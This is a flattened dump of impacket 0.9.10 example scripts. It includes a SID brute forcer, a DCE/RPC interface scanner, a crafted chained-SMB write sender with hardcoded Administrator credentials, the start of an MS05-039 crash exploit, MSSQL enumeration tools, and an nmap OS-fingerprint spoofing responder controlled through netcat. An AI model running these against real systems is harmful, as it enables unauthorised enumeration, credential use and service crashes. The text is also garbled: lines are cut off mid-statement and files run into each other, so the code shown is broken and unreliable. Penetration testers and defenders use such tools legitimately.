b7b31df9-d515-11d3-a11c-00105a1f515a v0.0 b97db8b2-4c63-11cf-bff6-08002be23f2f v2.0 b9e79e60-3d52-11ce-aaa1-00006901293f v0.2 bfa951d1-2f0e-11d3-bfd1-00c04fa3490a v1.0 c13d3372-cc20-4449-9b23-8cc8271b3885 v1.0 c33b9f46-2088-4dbc-97e3-6125f127661c v1.0 c681d488-d850-11d0-8c52-00c04fd90f7e v1.0 c6f3ee72-ce7e-11d1-b71e-00c04fc3111a v1.0 c8cb7687-e6d3-11d2-a958-00c04f682e16 v1.0 c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0 c9ac6db5-82b7-4e55-ae8a-e464ed7b4277 v1.0 ce1334a5-41dd-40ea-881d-64326b23effe v0.2 d049b186-814f-11d1-9a3c-00c04fc9b232 v1.1 d2d79dfa-3400-11d0-b40b-00aa005ff586 v1.0 d335b8f6-cb31-11d0-b0f9-006097ba4e54 v1.5 d3fbb514-0e3b-11cb-8fad-08002b1d29c3 v1.0 d4781cd6-e5d3-44df-ad94-930efe48a887 v0.0 d6d70ef0-0e3b-11cb-acc3-08002b1d29c3 v1.0 d6d70ef0-0e3b-11cb-acc3-08002b1d29c4 v1.0 d7f9e1c0-2247-11d1-ba89-00c04fd91268 v5.0 d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 dd490425-5325-4565-b774-7e27d6c09c24 v1.0 e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0 e248d0b8-bf15-11cf-8c5e-08002bb49649 v2.0 e33c0cc4-0482-101a-bc0c-02608c6ba218 v1.0 e3514235-4b06-11d1-ab04-00c04fc2dcd2 v4.0 e60c73e6-88f9-11cf-9af1-0020af6e72f4 v2.0 e67ab081-9844-3521-9d32-834f038001c0 v1.0 e76ea56d-453f-11cf-bfec-08002be23f2f v2.0 ea0a3165-4834-11d2-a6f8-00c04fa346cc v4.0 eb658b8a-7a64-4ddc-9b8d-a92610db0206 v0.0 ec02cae0-b9e0-11d2-be62-0020afeddf63 v1.0 ecec0d70-a603-11d0-96b1-00a0c91ece30 v1.0 ecec0d70-a603-11d0-96b1-00a0c91ece30 v2.0 eff55e30-4ee2-11ce-a3c9-00aa00607271 v1.0 f309ad18-d86a-11d0-a075-00c04fb68820 v0.0 f50aac00-c7f3-428e-a022-a6b71bfb9d43 v1.0 f5cc59b4-4264-101a-8c59-08002b2f8426 v1.1 f5cc5a18-4264-101a-8c59-08002b2f8426 v56.0 f5cc5a7c-4264-101a-8c59-08002b2f8426 v21.0 f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 f930c514-1215-11d3-99a5-00a0c9b61b04 v1.0 fc13257d-5567-4dea-898d-c6f9c48415a0 v1.0 fd7a0523-dc70-43dd-9b2e-9c5ed48225b1 v1.0 fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0 ffe561b8-bf15-11cf-8c5e-08002bb49649 v2.0 """.splitlines() if line) uuid_database = set((uuidstr.upper(), ver) for uuidstr, ver in uuid_database) # add the ones from ndrutils k = ndrutils.KNOWN_UUIDS.keys()[0] def fix_ndr_uuid(ndruuid): assert len(ndruuid) == 18 uuid = ndruuid[:16] maj, min = struct.unpack("BB", ndruuid[16:]) return uuid + struct.pack(" " return 1 host = args[0] port = int(args[1]) stringbinding = "ncacn_ip_tcp:%s" % host trans = transport.DCERPCTransportFactory(stringbinding) trans.set_dport(port) dce = dcerpc.DCERPC_v5(trans) dce.connect() iid = uuid.uuidtup_to_bin(("afa8bd80-7d8a-11c9-bef4-08002b102989", "1.0")) dce.bind(iid) dcemgmt = mgmt.DCERPCMgmt(dce) ifids = dcemgmt.inq_if_ids() uuidtups = set( uuid.bin_to_uuidtup(ifids.get_if_binuuid(index)) for index in range(ifids.get_ifcount()) ) dce.disconnect() probes = uuidtups | uuid_database for tup in sorted(probes): listed = tup in uuidtups dce.connect() binuuid = uuid.uuidtup_to_bin(tup) try: dce.bind(binuuid) except dcerpc.Exception, e: resp = dcerpc.MSRPCBindAck(str(e.args[1])) if (resp.getCtxItem(1)['Result'], resp.getCtxItem(1)['Reason']) == (2, 1): listening = False else: raise else: listening = True listed = tup in uuidtups otherversion = any(tup[0] == uuidstr for uuidstr, ver in uuidtups) if listed or listening: print "%r: %s, %s" % ( tup, "listed" if listed else "other version listed" if otherversion else "not listed", "listening" if listening else "not listening" ) if __name__ == "__main__": sys.exit(main(sys.argv[1:])) impacket-0.9.10/examples/lookupsid.py0000600000076500000240000001135612141750576017661 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: lookupsid.py 598 2012-07-11 19:12:55Z bethus@gmail.com $ # # DCE/RPC lookup sid brute forcer example # # Author: # Alberto Solino # # Reference for: # DCE/RPC LSARPC import socket import string import sys import types from impacket import uuid, ntlm, version from impacket.dcerpc import dcerpc_v4, dcerpc, transport, lsarpc import argparse class LSALookupSid: KNOWN_PROTOCOLS = { '139/SMB': (r'ncacn_np:%s[\pipe\lsarpc]', 139), '445/SMB': (r'ncacn_np:%s[\pipe\lsarpc]', 445), '135/TCP': (r'ncacn_ip_tcp:%s', 135), } def __init__(self, username, password, domain, protocols = None, hashes = None, maxRid=4000): if not protocols: protocols = LSALookupSid.KNOWN_PROTOCOLS.keys() self.__username = username self.__password = password self.__protocols = [protocols] self.__maxRid = int(maxRid) self.__domain = domain self.__lmhash = '' self.__nthash = '' if hashes is not None: self.__lmhash, self.__nthash = hashes.split(':') def dump(self, addr): print 'Brute forcing SIDs at %s' % addr # Try all requested protocols until one works. entries = [] for protocol in self.__protocols: protodef = LSALookupSid.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: entries = self.__bruteForce(rpctransport, self.__maxRid) except Exception, e: print 'Protocol failed: %s' % str(e) raise else: # Got a response. No need for further iterations. break def __bruteForce(self, rpctransport, maxRid): # UDP only works over DCE/RPC version 4. if isinstance(rpctransport, transport.UDPTransport): dce = dcerpc_v4.DCERPC_v4(rpctransport) else: dce = dcerpc.DCERPC_v5(rpctransport) entries = [] dce.connect() # Want encryption? Uncomment next line #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY) # Want fragmentation? Uncomment next line #dce.set_max_fragment_size(32) dce.bind(lsarpc.MSRPC_UUID_LSARPC) rpc = lsarpc.DCERPCLsarpc(dce) resp = rpc.LsarOpenPolicy2(rpctransport.get_dip(), access_mask=0x02000000) try: resp2 = rpc.LsarQueryInformationPolicy2(resp['ContextHandle'], lsarpc.POLICY_ACCOUNT_DOMAIN_INFORMATION) rootsid = resp2.formatDict()['sid'].formatCanonical() except Exception, e: print e for i in range(500,maxRid): res = rpc.LsarLookupSids(resp['ContextHandle'], [rootsid + '-%d' % i]) # If SOME_NOT_MAPPED or SUCCESS, let's extract data if res['ErrorCode'] == 0: item = res.formatDict() print "%d: %s\\%s (%d)" % (i, item[0]['domain'], item[0]['names'][0], item[0]['types'][0]) dce.disconnect() return entries # Process command-line arguments. if __name__ == '__main__': print version.BANNER parser = argparse.ArgumentParser() parser.add_argument('target', action='store', help='[domain/][username[:password]@]
') parser.add_argument('maxRid', action='store', default = '4000', nargs='?', help='max Rid to check (default 4000)') parser.add_argument('protocol', choices=LSALookupSid.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('') if domain is None: domain = '' lookup = LSALookupSid(username, password, domain, options.protocol, options.hashes, options.maxRid) lookup.dump(address) impacket-0.9.10/examples/loopchain.py0000600000076500000240000000361712141750576017625 0ustar betostaff00000000000000from impacket import smb import time class lotsSMB(smb.SMB): def loop_write_andx(self,tid,fid,data, offset = 0, wait_answer=1): pkt = smb.NewSMBPacket() pkt['Flags1'] = 0x18 pkt['Flags2'] = 0 pkt['Tid'] = tid writeAndX = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) pkt.addCommand(writeAndX) writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters() writeAndX['Parameters']['Fid'] = fid writeAndX['Parameters']['Offset'] = offset writeAndX['Parameters']['WriteMode'] = 0 writeAndX['Parameters']['Remaining'] = len(data) writeAndX['Parameters']['DataLength'] = len(data) writeAndX['Parameters']['DataOffset'] = len(pkt) writeAndX['Data'] = data+('A'*4000) saved_offset = len(pkt) writeAndX2 = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) pkt.addCommand(writeAndX2) writeAndX2['Parameters'] = smb.SMBWriteAndX_Parameters() writeAndX2['Parameters']['Fid'] = fid writeAndX2['Parameters']['Offset'] = offset writeAndX2['Parameters']['WriteMode'] = 0 writeAndX2['Parameters']['Remaining'] = len(data) writeAndX2['Parameters']['DataLength'] = len(data) writeAndX2['Parameters']['DataOffset'] = len(pkt) writeAndX2['Data'] = '\n' writeAndX2['Parameters']['AndXCommand'] = self.SMB_COM_WRITE_ANDX writeAndX2['Parameters']['AndXOffset'] = saved_offset self.sendSMB(pkt) if wait_answer: pkt = self.recvSMB() if pkt.isValidAnswer(self.SMB_COM_WRITE_ANDX): return pkt return None s = lotsSMB('*SMBSERVER','192.168.1.1') s.login('Administrator','pasword') tid = s.tree_connect(r'\\*SMBSERVER\IPC$') fid = s.open_andx(tid, r'\pipe\echo', smb.SMB_O_CREAT, smb.SMB_O_OPEN)[0] s.loop_write_andx(tid,fid,'<1234>\n', wait_answer = 0) time.sleep(2) s.close(tid,fid) impacket-0.9.10/examples/ms05-039-crash.py0000600000076500000240000000133412141750576020036 0ustar betostaff00000000000000import sys from exploit import DCERPCExploit from impacket.structure import Structure class PNP_QueryResConfList(Structure): alignment = 4 structure = ( ('treeRoot', 'w'), ('resourceType',' %s" % line, shell.onecmd(line) ms_sql.disconnect() impacket-0.9.10/examples/mssqlinstance.py0000600000076500000240000000255712141750576020537 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: mssqlinstance.py 631 2012-07-24 16:43:04Z bethus@gmail.com $ # # Description: [MC-SQLR] example. Retrieves the instances names from the target host # # Author: # Alberto Solino (beto@coresecurity.com) # # Reference for: # Structure # from impacket import version, tds import argparse import sys import string if __name__ == '__main__': import cmd print version.BANNER parser = argparse.ArgumentParser() parser.add_argument('host', action='store', help='target host') parser.add_argument('-timeout', action='store', default='5', help='timeout to wait for an answer') if len(sys.argv)==1: print "description: asks the remote host for its running MSSQL Instances\n" parser.print_help() sys.exit(1) options = parser.parse_args() ms_sql = tds.MSSQL(options.host) instances = ms_sql.getInstances(string.atoi(options.timeout)) if len(instances) == 0: print "No MSSQL Instances found" else: for i, instance in enumerate(instances): print "[*] Instance %d" % i for key in instance.keys(): print key + ":" + instance[key] impacket-0.9.10/examples/nmapAnswerMachine.py0000600000076500000240000010676312141750576021257 0ustar betostaff00000000000000import random import os_ident import uncrc32 try: import pcap as pcapy except: import pcapy from impacket import ImpactPacket from impacket import ImpactDecoder from impacket.ImpactPacket import TCPOption #defaults MAC = "01:02:03:04:05:06" IP = "192.168.67.254" IFACE = "eth0" OPEN_TCP_PORTS = [80, 443] OPEN_UDP_PORTS = [111] UDP_CMD_PORT = 12345 nmapOSDB = '/usr/share/nmap/nmap-os-db' # Fingerprint = 'Adtran NetVanta 3200 router' # CD=Z TOSI=Z <----------- NMAP detects it as Linux!!! # Fingerprint = 'ADIC Scalar 1000 tape library remote management unit' # DFI=S # Fingerprint = 'Siemens Gigaset SX541 or USRobotics USR9111 wireless DSL modem' # DFI=O U1(DF=N IPL=38) # Fingerprint = 'Apple Mac OS X 10.5.6 (Leopard) (Darwin 9.6.0)' # DFI=Y SI=S U1(DF=Y) Fingerprint = 'Sun Solaris 10 (SPARC)' # Fingerprint = 'Sun Solaris 9 (x86)' # Fingerprint = '3Com OfficeConnect 3CRWER100-75 wireless broadband router' # TI=Z DFI=N !SS TI=Z II=I # Fingerprint = 'WatchGuard Firebox X5w firewall/WAP' # TI=RD # no TI=Hex # Fingerprint = 'FreeBSD 6.0-STABLE - 6.2-RELEASE' # TI=RI # Fingerprint = 'Microsoft Windows 98 SE' # TI=BI ----> BROKEN! nmap shows no SEQ() output # Fingerprint = 'Microsoft Windows NT 4.0 SP5 - SP6' # TI=BI TOSI=S SS=S # Fingerprint = 'Microsoft Windows Vista Business' # TI=I U1(IPL=164) # Fingerprint = 'FreeBSD 6.1-RELEASE' # no TI (TI=O) # Fingerprint = '2Wire 1701HG wireless ADSL modem' # IE(R=N) # Fingerprint = 'Cisco Catalyst 1912 switch' # TOSI=O SS=S O_ETH = 0 O_IP = 1 O_ARP = 1 O_UDP = 2 O_TCP = 2 O_ICMP = 2 O_UDP_DATA = 3 O_ICMP_DATA = 3 def string2tuple(string): if string.find(':') >= 0: return [int(x) for x in string.split(':')] else: return [int(x) for x in string.split('.')] class Responder: templateClass = None signatureName = None def __init__(self, machine): self.machine = machine print "Initializing %s" % self.__class__.__name__ self.initTemplate() self.initFingerprint() def initTemplate(self): if not self.templateClass: self.template_onion = None else: try: probe = self.templateClass(0, ['0.0.0.0',self.getIP()],[0, 0]) except: probe = self.templateClass(0, ['0.0.0.0',self.getIP()]) self.template_onion = [probe.get_packet()] try: while 1: self.template_onion.append(self.template_onion[-1].child()) except: pass # print "Template: %s" % self.template_onion[O_ETH] # print "Options: %r" % self.template_onion[O_TCP].get_padded_options() # print "Flags: 0x%04x" % self.template_onion[O_TCP].get_th_flags() def initFingerprint(self): if not self.signatureName: self.fingerprint = None else: self.fingerprint = self.machine.fingerprint.get_tests()[self.signatureName].copy() def isMine(self, in_onion): return False def buildAnswer(self, in_onion): return None def sendAnswer(self, out_onion): self.machine.sendPacket(out_onion) def process(self, in_onion): if not self.isMine(in_onion): return False print "Got packet for %s" % self.__class__.__name__ out_onion = self.buildAnswer(in_onion) if out_onion: self.sendAnswer(out_onion) return True def getIP(self): return self.machine.ipAddress # Generic Responders (does the word Responder exist?) class ARPResponder(Responder): def isMine(self, in_onion): if len(in_onion) < 2: return False if in_onion[O_ARP].ethertype != ImpactPacket.ARP.ethertype: return False return ( in_onion[O_ARP].get_ar_op() == 1 and # ARP REQUEST in_onion[O_ARP].get_ar_tpa() == string2tuple(self.machine.ipAddress)) def buildAnswer(self, in_onion): eth = ImpactPacket.Ethernet() arp = ImpactPacket.ARP() eth.contains(arp) arp.set_ar_hrd(1) # Hardward type Ethernet arp.set_ar_pro(0x800) # IP arp.set_ar_op(2) # REPLY arp.set_ar_hln(6) arp.set_ar_pln(4) arp.set_ar_sha(string2tuple(self.machine.macAddress)) arp.set_ar_spa(string2tuple(self.machine.ipAddress)) arp.set_ar_tha(in_onion[O_ARP].get_ar_sha()) arp.set_ar_tpa(in_onion[O_ARP].get_ar_spa()) eth.set_ether_shost(arp.get_ar_sha()) eth.set_ether_dhost(arp.get_ar_tha()) return [eth, arp] class IPResponder(Responder): def buildAnswer(self, in_onion): eth = ImpactPacket.Ethernet() ip = ImpactPacket.IP() eth.contains(ip) eth.set_ether_shost(in_onion[O_ETH].get_ether_dhost()) eth.set_ether_dhost(in_onion[O_ETH].get_ether_shost()) ip.set_ip_src(in_onion[O_IP].get_ip_dst()) ip.set_ip_dst(in_onion[O_IP].get_ip_src()) ip.set_ip_id(self.machine.getIPID()) return [eth, ip] def sameIPFlags(self, in_onion): if not self.template_onion: return True return (self.template_onion[O_IP].get_ip_off() & 0xe000) == (in_onion[O_IP].get_ip_off() & 0xe000) def isMine(self, in_onion): if len(in_onion) < 2: return False return ( (in_onion[O_IP].ethertype == ImpactPacket.IP.ethertype) and (in_onion[O_IP].get_ip_dst() == self.machine.ipAddress) and self.sameIPFlags(in_onion) ) def setTTLFromFingerprint(self, out_onion): f = self.fingerprint # Test T: Initial TTL = range_low-range_hi, base 16 # Assumption: we are using the minimum in the TTL range try: ttl = f['T'].split('-') ttl = int(ttl[0], 16) except: ttl = 0x7f # Test TG: Initial TTL Guess. It's just a number, we prefer this try: ttl = int(f['TG'], 16) except: pass out_onion[O_IP].set_ip_ttl(ttl) class ICMPResponder(IPResponder): def buildAnswer(self, in_onion): out_onion = IPResponder.buildAnswer(self, in_onion) icmp = ImpactPacket.ICMP() out_onion[O_IP].contains(icmp) out_onion.append(icmp) icmp.set_icmp_id(in_onion[O_ICMP].get_icmp_id()) icmp.set_icmp_seq(in_onion[O_ICMP].get_icmp_seq()) out_onion[O_IP].set_ip_id(self.machine.getIPID_ICMP()) return out_onion def isMine(self, in_onion): if not IPResponder.isMine(self, in_onion): return False if len(in_onion) < 3: return False return ( (in_onion[O_ICMP].protocol == ImpactPacket.ICMP.protocol) and self.sameICMPTemplate(in_onion)) def sameICMPTemplate(self, in_onion): t_ip = self.template_onion[O_IP] t_icmp = self.template_onion[O_ICMP] t_icmp_datalen = self.template_onion[O_ICMP_DATA].get_size() return ( (t_ip.get_ip_tos() == in_onion[O_IP].get_ip_tos()) and (t_ip.get_ip_df() == in_onion[O_IP].get_ip_df()) and (t_icmp.get_icmp_type() == in_onion[O_ICMP].get_icmp_type()) and (t_icmp.get_icmp_code() == in_onion[O_ICMP].get_icmp_code()) and (t_icmp_datalen == in_onion[O_ICMP_DATA].get_size()) ) class UDPResponder(IPResponder): def isMine(self, in_onion): return ( IPResponder.isMine(self, in_onion) and (len(in_onion) >= 3) and (in_onion[O_UDP].protocol == ImpactPacket.UDP.protocol) ) class OpenUDPResponder(UDPResponder): def isMine(self, in_onion): return ( UDPResponder.isMine(self, in_onion) and self.machine.isUDPPortOpen(in_onion[O_UDP].get_uh_dport())) def buildAnswer(self, in_onion): out_onion = IPResponder.buildAnswer(self, in_onion) udp = ImpactPacket.UDP() out_onion[O_IP].contains(udp) out_onion.append(udp) udp.set_uh_dport(in_onion[O_UDP].get_uh_sport()) udp.set_uh_sport(in_onion[O_UDP].get_uh_dport()) return out_onion class ClosedUDPResponder(UDPResponder): def isMine(self, in_onion): return ( UDPResponder.isMine(self, in_onion) and not self.machine.isUDPPortOpen(in_onion[O_UDP].get_uh_dport())) def buildAnswer(self, in_onion): out_onion = IPResponder.buildAnswer(self, in_onion) icmp = ImpactPacket.ICMP() out_onion[O_IP].contains(icmp) out_onion.append(icmp) icmp.contains(in_onion[O_IP]) out_onion += in_onion[O_IP:] icmp.set_icmp_type(icmp.ICMP_UNREACH) icmp.set_icmp_code(icmp.ICMP_UNREACH_PORT) return out_onion class TCPResponder(IPResponder): def buildAnswer(self, in_onion): out_onion = IPResponder.buildAnswer(self, in_onion) tcp = ImpactPacket.TCP() out_onion[O_IP].contains(tcp) out_onion.append(tcp) tcp.set_th_dport(in_onion[O_TCP].get_th_sport()) tcp.set_th_sport(in_onion[O_TCP].get_th_dport()) return out_onion def sameTCPFlags(self, in_onion): if not self.template_onion: return True in_flags = in_onion[O_TCP].get_th_flags() & 0xfff t_flags = self.template_onion[O_TCP].get_th_flags() & 0xfff return in_flags == t_flags def sameTCPOptions(self, in_onion): if not self.template_onion: return True in_options = in_onion[O_TCP].get_padded_options() t_options = self.template_onion[O_TCP].get_padded_options() return in_options == t_options def isMine(self, in_onion): if not IPResponder.isMine(self, in_onion): return False if len(in_onion) < 3: return False return ( in_onion[O_TCP].protocol == ImpactPacket.TCP.protocol and self.sameTCPFlags(in_onion) and self.sameTCPOptions(in_onion) ) class OpenTCPResponder(TCPResponder): def isMine(self, in_onion): return ( TCPResponder.isMine(self, in_onion) and in_onion[O_TCP].get_SYN() and self.machine.isTCPPortOpen(in_onion[O_TCP].get_th_dport())) def buildAnswer(self, in_onion): out_onion = TCPResponder.buildAnswer(self, in_onion) out_onion[O_TCP].set_SYN() out_onion[O_TCP].set_ACK() out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq()+1) out_onion[O_TCP].set_th_seq(self.machine.getTCPSequence()) return out_onion class ClosedTCPResponder(TCPResponder): def isMine(self, in_onion): return ( TCPResponder.isMine(self, in_onion) and in_onion[O_TCP].get_SYN() and not self.machine.isTCPPortOpen(in_onion[O_TCP].get_th_dport())) def buildAnswer(self, in_onion): out_onion = TCPResponder.buildAnswer(self, in_onion) out_onion[O_TCP].set_RST() out_onion[O_TCP].set_ACK() out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq()+1) out_onion[O_TCP].set_th_seq(self.machine.getTCPSequence()) return out_onion class UDPCommandResponder(OpenUDPResponder): # default UDP_CMD_PORT is 12345 # use with: # echo cmd:exit | nc -u $(IP) $(UDP_CMD_PORT) # echo cmd:who | nc -u $(IP) $(UDP_CMD_PORT) def set_port(self, port): self.port = port self.machine.openUDPPort(port) return self def isMine(self, in_onion): return ( OpenUDPResponder.isMine(self, in_onion))# and #in_onion[O_UDP].get_uh_dport() == self.port) def buildAnswer(self, in_onion): cmd = in_onion[O_UDP_DATA].get_bytes().tostring() if cmd[:4] == 'cmd:': cmd = cmd[4:].strip() print "Got command: %r" % cmd if cmd == 'exit': from sys import exit exit() out_onion = OpenUDPResponder.buildAnswer(self, in_onion) out_onion.append(ImpactPacket.Data()) out_onion[O_UDP].contains(out_onion[O_UDP_DATA]) if cmd == 'who': out_onion[O_UDP_DATA].set_data(self.machine.fingerprint.get_id()) return out_onion # NMAP2 specific responders class NMAP2UDPResponder(ClosedUDPResponder): signatureName = 'U1' # No real need to filter # def isMine(self, in_onion): # return ( # ClosedUDPResponder.isMine(self, inOnion) and # (in_onion[O_UDP_DATA].get_size() == 300)) def buildAnswer(self, in_onion): out_onion = ClosedUDPResponder.buildAnswer(self, in_onion) f = self.fingerprint # assume R = Y try: if (f['R'] == 'N'): return None except: pass # Test DF: Don't fragment IP bit set = [YN] if (f['DF'] == 'Y'): out_onion[O_IP].set_ip_df(True) else: out_onion[O_IP].set_ip_df(False) self.setTTLFromFingerprint(out_onion) # UN. Assume 0 try: un = int(f['UN'],16) except: un = 0 out_onion[O_ICMP].set_icmp_void(un) # RIPL. Assume original packet just quoted try: ripl = int(f['RIPL'],16) # G generates exception out_onion[O_ICMP_DATA].set_ip_len(ripl) except: pass # RID. Assume original packet just quoted try: rid = int(f['RID'],16) # G generates exception out_onion[O_ICMP_DATA].set_ip_id(rid) except: pass # RIPCK. Assume original packet just quoted try: ripck = f['RIPCK'] except: ripck = 'G' if ripck == 'I': out_onion[O_ICMP_DATA].set_ip_sum(0x6765) elif ripck == 'Z': out_onion[O_ICMP_DATA].set_ip_sum(0) elif ripck == 'G': out_onion[O_ICMP_DATA].auto_checksum = 0 # RUCK. Assume original packet just quoted try: ruck = int(f['RUCK'], 16) out_onion[O_ICMP_DATA+1].set_uh_sum(ruck) except: out_onion[O_ICMP_DATA+1].auto_checksum = 0 # RUD. Assume original packet just quoted try: rud = f['RUD'] except: rud = 'G' if rud == 'I': udp_data = out_onion[O_ICMP_DATA+2] udp_data.set_data('G'*udp_data.get_size()) # IPL. Assume all original packet is quoted # This has to be the last thing we do # as we are going to render the packet before doing it try: ipl = int(f['IPL'], 16) except: ipl = None if not ipl is None: data = out_onion[O_ICMP_DATA].get_packet() out_onion[O_ICMP].contains(ImpactPacket.Data()) ip_and_icmp_len = out_onion[O_IP].get_size() data = data[:ipl - ip_and_icmp_len] data += '\x00'*(ipl-len(data)-ip_and_icmp_len) out_onion = out_onion[:O_ICMP_DATA] out_onion.append(ImpactPacket.Data(data)) out_onion[O_ICMP].contains(out_onion[O_ICMP_DATA]) return out_onion class NMAP2ICMPResponder(ICMPResponder): def buildAnswer(self, in_onion): f = self.fingerprint # assume R = Y try: if (f['R'] == 'N'): return None except: pass out_onion = ICMPResponder.buildAnswer(self, in_onion) # assume DFI = N try: dfi = f['DFI'] except: dfi = 'N' if dfi == 'N': out_onion[O_IP].set_ip_df(False) elif dfi == 'Y': out_onion[O_IP].set_ip_df(True) elif dfi == 'S': out_onion[O_IP].set_ip_df(in_onion[O_IP].get_ip_df()) elif dfi == 'O': out_onion[O_IP].set_ip_df(not in_onion[O_IP].get_ip_df()) else: raise Exception('Unsupported IE(DFI=%s)' % dfi) # assume DLI = S try: dli = f['DLI'] except: dli = 'S' if dli == 'S': out_onion[O_ICMP].contains(in_onion[O_ICMP_DATA]) elif dli != 'Z': raise Exception('Unsupported IE(DFI=%s)' % dli) self.setTTLFromFingerprint(out_onion) # assume SI = S try: si = f['SI'] except: si = 'S' if si == 'S': out_onion[O_ICMP].set_icmp_seq(in_onion[O_ICMP].get_icmp_seq()) elif si == 'Z': out_onion[O_ICMP].set_icmp_seq(0) # this is not currently supported by nmap, but I've done it already else: try: out_onion[O_ICMP].set_icmp_seq(int(si, 16)) # this is not supported either by nmap except: raise Exception('Unsupported IE(SI=%s)' % si) # assume CD = S try: cd = f['CD'] except: cd = 'S' if cd == 'Z': out_onion[O_ICMP].set_icmp_code(0) elif cd == 'S': out_onion[O_ICMP].set_icmp_code(in_onion[O_ICMP].get_icmp_code()) elif cd == 'O': out_onion[O_ICMP].set_icmp_code(in_onion[O_ICMP].get_icmp_code()+1) # no examples in DB else: try: out_onion[O_ICMP].set_icmp_code(int(cd, 16)) # documented, but no examples available except: raise Exception('Unsupported IE(CD=%s)' % cd) # assume TOSI = S try: tosi = f['TOSI'] except: tosi = 'S' if tosi == 'Z': out_onion[O_IP].set_ip_tos(0) elif tosi == 'S': out_onion[O_IP].set_ip_tos(in_onion[O_IP].get_ip_tos()) elif tosi == 'O': out_onion[O_IP].set_ip_tos(in_onion[O_IP].get_ip_tos()+1) # no examples in DB else: try: out_onion[O_IP].set_ip_tos(int(tosi, 16)) # documented, but no examples available except: raise Exception('Unsupported IE(TOSI=%s)' % tosi) return out_onion class NMAP2TCPResponder(TCPResponder): def buildAnswer(self, in_onion): out_onion = TCPResponder.buildAnswer(self, in_onion) f = self.fingerprint # Test R: There is a response = [YN] if (f['R'] == 'N'): return None # Test DF: Don't fragment IP bit set = [YN] if (f['DF'] == 'Y'): out_onion[O_IP].set_ip_df(True) else: out_onion[O_IP].set_ip_df(False) # Test W: Initial TCP windows size try: win = int(f['W'],16) except: win = 0 out_onion[O_TCP].set_th_win(win) self.setTTLFromFingerprint(out_onion) # Test CC: Explicit congestion notification # Two TCP flags are used in this test: ECE and CWR try: cc = f['CC'] if cc == 'N': ece,cwr = 0,0 if cc == 'Y': ece,cwr = 1,0 if cc == 'S': ece,cwr = 1,1 if cc == 'O': ece,cwr = 0,1 except: ece,cwr = 0,0 if ece: out_onion[O_TCP].set_ECE() else: out_onion[O_TCP].reset_ECE() if cwr: out_onion[O_TCP].set_CWR() else: out_onion[O_TCP].reset_CWR() # Test O: TCP Options try: options = f['O'] except: options = '' self.setTCPOptions(out_onion, options) # Test S: TCP Sequence number # Z: Sequence number is zero # A: Sequence number is the same as the ACK in the probe # A+: Sequence number is the same as the ACK in the probe + 1 # O: Other value try: s = f['S'] except: s = 'O' if s == 'Z': out_onion[O_TCP].set_th_seq(0) if s == 'A': out_onion[O_TCP].set_th_seq(in_onion[O_TCP].get_th_ack()) if s == 'A+': out_onion[O_TCP].set_th_seq(in_onion[O_TCP].get_th_ack()+1) if s == 'O': out_onion[O_TCP].set_th_seq(self.machine.getTCPSequence()) # Test A: TCP ACK number # Z: Ack is zero # S: Ack is the same as the Squence number in the probe # S+: Ack is the same as the Squence number in the probe + 1 # O: Other value try: a = f['A'] except: a = 'O' if a == 'Z': out_onion[O_TCP].set_th_ack(0) if a == 'S': out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq()) if a == 'S+': out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq()+1) # Test Q: Quirks # R: Reserved bit set (right after the header length) # U: Urgent pointer non-zero and URG flag clear try: if 'R' in f['Q']: out_onion[O_TCP].set_flags(0x800) except: pass try: if 'U' in f['Q']: out_onion[O_TCP].set_th_urp(0xffff) except: pass # Test F: TCP Flags try: flags = f['F'] except: flags = '' if 'E' in flags: out_onion[O_TCP].set_ECE() if 'U' in flags: out_onion[O_TCP].set_URG() if 'A' in flags: out_onion[O_TCP].set_ACK() if 'P' in flags: out_onion[O_TCP].set_PSH() if 'R' in flags: out_onion[O_TCP].set_RST() if 'S' in flags: out_onion[O_TCP].set_SYN() if 'F' in flags: out_onion[O_TCP].set_FIN() # Test RD: TCP Data checksum (mostly for data in RST) try: crc = f['RD'] if crc != '0': # when the crc = int(crc, 16) data = 'TCP Port is closed\x00' data += uncrc32.compensate(data, crc) data = ImpactPacket.Data(data) out_onion.append(data) out_onion[O_TCP].contains(data) except: pass return out_onion def setTCPOptions(self, onion, options): def getValue(string, i): value = 0 idx = i for c in options[i:]: try: value = value * 0x10 + int(c,16) except: break idx += 1 return value, idx # Test O,O1=O6: TCP Options # L: End of Options # N: NOP # S: Selective ACK # Mx: MSS (x is a hex number) # Wx: Windows Scale (x is a hex number) # Tve: Timestamp (v and e are two binary digits, v for TSval and e for TSecr i = 0 tcp = onion[O_TCP] while i < len(options): opt = options[i] i += 1 if opt == 'L': tcp.add_option(TCPOption(TCPOption.TCPOPT_EOL)) if opt == 'N': tcp.add_option(TCPOption(TCPOption.TCPOPT_NOP)) if opt == 'S': 